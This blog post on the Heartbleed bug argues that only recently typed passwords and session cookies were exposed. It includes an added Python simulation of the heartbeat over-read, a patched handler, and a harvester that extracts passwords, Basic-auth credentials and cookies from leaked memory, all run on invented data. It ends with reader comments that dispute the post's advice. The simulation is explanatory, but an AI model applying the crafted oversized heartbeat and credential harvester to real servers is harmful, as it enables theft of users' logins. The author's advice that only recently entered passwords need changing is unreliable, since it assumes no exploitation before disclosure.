The Heartbleed bug hands an attacker a random chunk of the server's memory (up to 64KB per request). If a hacker wrote a script that queried "login.yahoo.com" a thousand times per second, they'd probably harvest a hundred usernames/passwords per second.
Usernames and passwords travel in HTTP requests just like cookies and URLs, so if one is exposed, so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):
Luckily, sessions remain open for weeks, whereas the bug was only publicly known, and therefore widely exploited, for a couple of days before servers were patched. The only passwords you need to change are the ones you entered during those couple of days. Personally, I haven't entered any passwords over the last couple of days, so I don't need to change any passwords.
At most, since hackers could have stolen the session cookies, you might want to log out and log back in on servers that were vulnerable; logging out invalidates the old session cookie on the server side.
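To make the argument above concrete, here is an added simulation (not code from the original post) of what the leak looks like from both sides: a heartbeat handler that trusts the attacker-supplied payload length and copies past the end of the record, the patched handler that rejects it, and a harvester that pulls passwords, Basic-auth credentials and session cookies out of the same leaked bytes. The "server memory" is a constructed byte string of made-up requests sitting side by side on a heap; the host names, cookies and passwords are invented for the example, and the handler is a model of the over-read, not OpenSSL's code.

```python
import re
import base64
import struct
from urllib.parse import unquote

# Constructed "server heap": a few HTTP requests lying next to each other, as
# they would after a busy TLS server parsed them. Every name, cookie and
# password here is made up for this example.
CONSTRUCTED_HEAP = (
    b"POST /login HTTP/1.1\r\nHost: login.example.test\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    + b"username=alice&password=S3cret%21&remember=1\r\n"
    + b"\x00" * 37
    + b"GET /photos HTTP/1.1\r\nHost: photos.example.test\r\n"
    + b"Cookie: session_id=9f2c1e7a44b0; theme=dark\r\n\r\n"
    + b"\x00" * 11
    + b"GET /api HTTP/1.1\r\nHost: api.example.test\r\n"
    + b"Authorization: Basic " + base64.b64encode(b"bob:hunter2") + b"\r\n\r\n"
)

HB_REQUEST = 1   # heartbeat_request (RFC 6520)
HB_RESPONSE = 2  # heartbeat_response

def build_heartbeat(claimed_len, payload):
    """Heartbeat message: type(1) | payload_length(2) | payload | padding(16).
    A benign client sets claimed_len == len(payload); Heartbleed sets it larger."""
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * 16

def vulnerable_heartbeat_handler(record, heap):
    """Model of the unpatched server: trusts payload_length from the peer and
    copies that many bytes starting at the payload, so the copy runs off the end
    of the record into whatever follows it in memory (here: `heap`)."""
    hb_type, claimed_len = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    memory = record[3:] + heap  # the record is assumed to sit just before `heap`
    return struct.pack("!BH", HB_RESPONSE, claimed_len) + memory[:claimed_len]

def patched_heartbeat_handler(record, heap):
    """The fix: drop any heartbeat whose claimed length does not fit in the record."""
    hb_type, claimed_len = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    if 1 + 2 + claimed_len + 16 > len(record):
        return None  # silently discarded, nothing is echoed back
    payload = record[3:3 + claimed_len]
    return struct.pack("!BH", HB_RESPONSE, claimed_len) + payload

def harvest(leaked):
    """Pull form passwords, Basic-auth credentials and cookies out of a leaked
    memory chunk. All three come from the same bytes, which is the post's point."""
    found = {"passwords": [], "cookies": [], "basic_auth": []}
    for m in re.finditer(rb"username=([^&\s]+)&password=([^&\s]+)", leaked):
        found["passwords"].append((unquote(m.group(1).decode()),
                                   unquote(m.group(2).decode())))
    for m in re.finditer(rb"Cookie: ([^\r\n]+)", leaked):
        for part in m.group(1).decode().split(";"):
            name, _, value = part.strip().partition("=")
            found["cookies"].append((name, value))
    for m in re.finditer(rb"Authorization: Basic ([A-Za-z0-9+/=]+)", leaked):
        try:
            user, _, pw = base64.b64decode(m.group(1)).decode().partition(":")
            found["basic_auth"].append((user, pw))
        except (ValueError, UnicodeDecodeError):
            pass
    return found

def heartbleed_demo(handler, heap=CONSTRUCTED_HEAP):
    """Send a one-byte heartbeat claiming 0xFFFF bytes and harvest whatever comes back.
    Returns None when the handler refuses the request (the patched behaviour)."""
    request = build_heartbeat(0xFFFF, b"A")
    response = handler(request, heap)
    if response is None:
        return None
    return harvest(response[3:])  # strip the 3-byte response header

if __name__ == "__main__":
    print("vulnerable:", heartbleed_demo(vulnerable_heartbeat_handler))
    print("patched:   ", heartbleed_demo(patched_heartbeat_handler))
```

Run against the vulnerable handler, a single request returns alice's form password, bob's Basic-auth password and the photos session cookie together; the patched handler returns nothing. Whether the attacker gets a password or a cookie depends only on what happened to be adjacent in memory, which is why changing a password without also invalidating the session does not close the hole.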
From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys.

This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, and I'm changing none of them, because I didn't have to re-login over the last few days. I had persistent sessions.
Why are you saying only to worry about passwords you used in the last couple of days?
Who is to say that there have not been people using this hole for months or even longer?
I would change passwords on some sites which have already fixed the flaw. Sticky Password suggested the same: http://blogen.stickypassword.com/sticky-password-and-the-heartbleed-bug/
What about the servers that use non-FS cipher suites, then? I agree we're talking about another kind of adversary, but this is far from irrelevant.